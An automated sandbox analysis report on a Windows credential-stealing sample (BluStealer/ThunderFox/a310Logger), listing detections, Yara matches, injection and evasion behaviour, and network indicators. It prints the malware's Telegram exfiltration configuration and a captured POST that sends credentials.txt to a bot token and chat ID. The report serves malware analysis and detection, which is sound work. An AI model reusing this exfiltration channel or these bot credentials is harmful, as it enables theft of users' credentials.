Windows Analysis Report
SecuriteInfo.com.W32.AIDetectNet.01.19566.31995

Overview

General Information

Sample Name: SecuriteInfo.com.W32.AIDetectNet.01.19566.31995 (renamed file extension from 31995 to exe)
Analysis ID: 679095
MD5: 7278f8490937cab29d3dd5bc75cb52ab
SHA1: 69a0419c995fc139ea27e731a44205cb1b686f1d
SHA256: 0fabbda008ee7544a4f2d1bdaf5621f19bc41e82740f293dfe1644fc0af9230b
Tags: exe
Infos:

Detection

BluStealer, ThunderFox Stealer, a310Logger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected BluStealer
Antivirus / Scanner detection for submitted sample
Yara detected a310Logger
Yara detected ThunderFox Stealer
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Yara detected Generic Downloader
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Uses a known web browser user agent for HTTP communication
Contains functionality to detect virtual machines (SLDT)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Virustotal: Detection: 25% Perma Link
Antivirus / Scanner detection for submitted sample
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Avira: detected
Machine Learning detection for sample
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 14.0.MSBuild.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.461f2c8.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.470f308.3.unpack Avira: Label: TR/Dropper.Gen
Source: 0.0.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.f10000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen7
Source: 16.0.AppLaunch.exe.4e00000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.45f72a8.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.unpack Avira: Label: TR/Dropper.Gen
Source: 14.0.MSBuild.exe.400000.0.unpack Malware Configuration Extractor: BluStealer {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendMessage?chat_id=1269002131"}
Uses 32bit PE files
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.3:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.42.16:443 -> 192.168.2.3:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.3:49753 version: TLS 1.2
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ThunderFox.pdb source: AppLaunch.exe, 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp, AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000010.00000003.380923428.0000000007E66000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\ Jump to behavior

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.5b80000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.408533446.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 10ee8d30a5d01c042afd7b2b205facc4
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendDocument?chat_id=1269002131&caption=credentials.txt:::computer\user HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 201Connection: Keep-AliveCache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.31.4
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.31.4
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.31.4
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.108.210
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.108.210
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.108.210
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.108.210
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.108.210
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.108.210
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.108.210
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.31.4
Source: unknown TCP traffic detected without corresponding DNS query: 209.197.3.8
Source: unknown TCP traffic detected without corresponding DNS query: 209.197.3.8
Source: unknown TCP traffic detected without corresponding DNS query: 23.201.249.71
Source: unknown TCP traffic detected without corresponding DNS query: 23.201.249.71
Source: unknown TCP traffic detected without corresponding DNS query: 23.201.249.71
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.5.146
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 209.197.3.8
Source: unknown TCP traffic detected without corresponding DNS query: 209.197.3.8
Source: unknown TCP traffic detected without corresponding DNS query: 209.197.3.8
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.42.16
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.42.16
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.5.88
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.5.88
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.5.88
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.42.16
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.5.88
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.5.88
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.5.88
Source: MSBuild.exe, 0000000E.00000002.537276033.0000000000F73000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000003.421757868.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.359072458.000000000340B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/
Source: MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/Qv
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000000.351294987.0000000000401000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendDocument?chat_id=1269
Source: MSBuild.exe, 0000000E.00000003.422081191.0000000000F11000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: unknown HTTP traffic detected: POST /bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendDocument?chat_id=1269002131&caption=credentials.txt:::computer\user HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 201Connection: Keep-AliveCache-Control: no-cache
Source: unknown DNS traffic detected: queries for: api.telegram.org
Source: unknown HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.3:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.42.16:443 -> 192.168.2.3:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.3:49753 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 16.3.AppLaunch.exe.7e9a6e8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 16.3.AppLaunch.exe.7e9a6e8.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 16.2.AppLaunch.exe.9250000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.470f308.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.45f72a8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 14.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.470f308.3.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.461f2c8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 16.2.AppLaunch.exe.9250000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000010.00000003.380923428.0000000007E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000000.00000002.379707702.0000000004597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000002.364389176.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
.NET source code contains very large array initializations
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, bgr.cs Large array initialization: tms: array initializer size 2385920
Uses 32bit PE files
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 16.3.AppLaunch.exe.7e9a6e8.0.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.AppLaunch.exe.7e9a6e8.0.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpScribbles date = 2021-01-21, author = Arnim Rupp, description = Detects .NET red/black-team tools via typelibguid, reference = https://github.com/V1V1/SharpScribbles, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 16.3.AppLaunch.exe.7e9a6e8.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.AppLaunch.exe.9250000.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.AppLaunch.exe.7e9a6e8.0.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpScribbles date = 2021-01-21, author = Arnim Rupp, description = Detects .NET red/black-team tools via typelibguid, reference = https://github.com/V1V1/SharpScribbles, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.AppLaunch.exe.9250000.0.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpScribbles date = 2021-01-21, author = Arnim Rupp, description = Detects .NET red/black-team tools via typelibguid, reference = https://github.com/V1V1/SharpScribbles, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.470f308.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.45f72a8.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 14.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.470f308.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.461f2c8.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 16.2.AppLaunch.exe.9250000.0.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.AppLaunch.exe.9250000.0.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpScribbles date = 2021-01-21, author = Arnim Rupp, description = Detects .NET red/black-team tools via typelibguid, reference = https://github.com/V1V1/SharpScribbles, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: HKTL_NET_GUID_SharpScribbles date = 2021-01-21, author = Arnim Rupp, description = Detects .NET red/black-team tools via typelibguid, reference = https://github.com/V1V1/SharpScribbles, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.380923428.0000000007E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000002.379707702.0000000004597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000002.364389176.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_01BCF030 0_2_01BCF030
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_01BC3D10 0_2_01BC3D10
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_01BC3D00 0_2_01BC3D00
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_05484A60 0_2_05484A60
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_05484A50 0_2_05484A50
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_06337E12 0_2_06337E12
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_0633A48D 0_2_0633A48D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_0633BEB5 0_2_0633BEB5
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_06358337 0_2_06358337
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_0635DF90 0_2_0635DF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 16_2_051305B0 16_2_051305B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 16_2_051305A0 16_2_051305A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 16_2_05134850 16_2_05134850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 16_2_05134860 16_2_05134860
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.383883284.00000000046DC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBB NATIVE BOTNET.exe vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.358839460.00000000033F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.384949271.000000000477C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBB NATIVE BOTNET.exe vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000000.262097375.0000000000F12000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameProforma Invoice INV-87634543-7.exe vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.361648144.00000000034B6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBB NATIVE BOTNET.exe vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Binary or memory string: OriginalFilenameProforma Invoice INV-87634543-7.exe vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
PE file contains strange resources
